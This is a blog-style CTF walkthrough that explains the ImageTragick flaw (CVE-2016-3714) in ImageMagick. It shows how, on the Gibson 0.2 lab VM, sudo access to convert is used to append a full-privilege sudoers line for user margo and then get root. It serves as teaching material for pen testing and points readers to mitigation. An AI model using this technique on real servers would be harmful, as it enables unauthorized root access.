In my Vulnhub Walkthrough of Gibson: 0.2, I learned about ImageTragick. ImageTragick was the named dubbed for a vulnerability found in ImageMagick which was announced in CVE-2016-3714. ImageMagick is a program that is commonly used by web servers to process images.

Due to the way ImageMagick works, it’s possible to execute shell command injection. If a web server also uses ImageMagick to process images that users upload, it’s possible for someone to conduct remote code execution. For example, a malicious attacker could craft a a file that executes a callback to a shell when a web server process it with ImageMagick.

Please refer to the Openwall post that does a great job of explaining the technical details of why and how the vulnerability works. For this post, I’ll give a quick example of how it could be used to gain root on Gibson: 0.2. My hope is that seeing this example should help you replicate ImageTragick in your future CTF/pen testing endeavors.

Though not the only way to take advantage of the exploit, below is how to structure your command in this example usage of ImageTragick.

The first thing you should understand is that the commands ran by this exploit will execute at the level of the user who ran it. For example, in Gibson 0.2, margo is a user that we were able to ssh into our target machine that is vulnerable to ImageTragick.

Running id shows that margo is a non-root user.

This time, let’s run id with convert. As you can see below, it was executed by margo meaning we are still limited to margo’s permission levels.

In this particular CTF, margo just so happens to be able to run convert with sudo which was one way the VM was designed for you to gain root.

As you can see, running convert with sudo now means you can run any command with root privileges. Knowing this, you can simply give margo full sudo privileges by echoing margo ALL=(ALL:ALL) ALL in /etc/sudoers.

You can test your success by seeing if you can sudo su to gain root.

Just like magic 🙂

I encourage you to read up on other ways ImageTragick can be used and how to mitigate it if you employ ImageMagick on your web servers. There is a whole site dedicated to it creatively named https://imagetragick.com/.

I hope this helps with your future projects. Leave a comment below if you have any questions or inputs.

Thanks for reading and Happy Hacking!

ImageTragick Exploit Example
Tagged on:                 

2 thoughts on “ImageTragick Exploit Example

Leave a Reply